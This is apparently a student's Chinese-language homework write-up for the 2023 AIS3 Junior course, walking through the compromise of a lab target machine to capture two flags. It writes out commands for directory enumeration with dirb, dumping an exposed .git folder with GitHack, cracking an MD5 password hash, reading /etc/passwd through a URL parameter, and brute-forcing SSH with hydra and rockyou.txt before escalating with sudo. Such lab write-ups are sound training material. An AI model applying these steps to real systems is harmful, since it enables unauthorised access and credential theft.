- 2023 AIS3 JUNIOR Homework
一、 作業內容與目標 打一號靶機,取得 Flag
二、步驟
先確認是否有連上網。
ping 10.17.1.9
drib 該網站發現 backend 可以登入的地⽅。
dirb http://10.17.1.9:80到 GitHack 資料夾,後用 GitHack 把網站抓下來。
cd GitHackpython GitHack.py http://10.17.1.9/backend/.git/

cat index.php 後,發現 password,由於下面程式套用 if($username==’admin’~~~),故得知 admin 為 username。

將上圖反白處的亂碼製成 md5 檔,方可進行後續的爆破。
cd echo 'eb0a191797624dd3a48fa681d3061212' > admin.md5
為後續爆破便利,欲將 wordlist 字典中的 rockyou.txt 檔案複製至上圖語 admin.md5 檔案同一資料夾內。

由於爆破未果,而用線上工具解決 password 亂碼。最終得出密碼是 master。

登入成功後,將上方網址中的 hosts 更為 passwd,於下方反白處,發現 red 使用者名稱登入現象與眾不同。

9. 將 red 使用者名稱進行爆破1,密碼在下方綠字處,為 victor。 hydra -l red -P rockyou.txt -t 64 -I ssh://10.17.1.9
10. 欲使用 red 進行登入,輸入密碼後,如圖所示。 ssh red@10.17.1.9
11. 確認 red 的權限,為ALL sudo -i
ls 後發現 local.txt,cat local.txt 之後,發現 flag 為
AIS3_Junior{YouAreBruteForcer:D:D:D:D:D}
終了,然,非也。仍有 flag 尚未尋獲,變身為管理員身份後,發現還有一個 flag 為:
AIS3\_Junior{First\_PenTestXDDDDDDD}
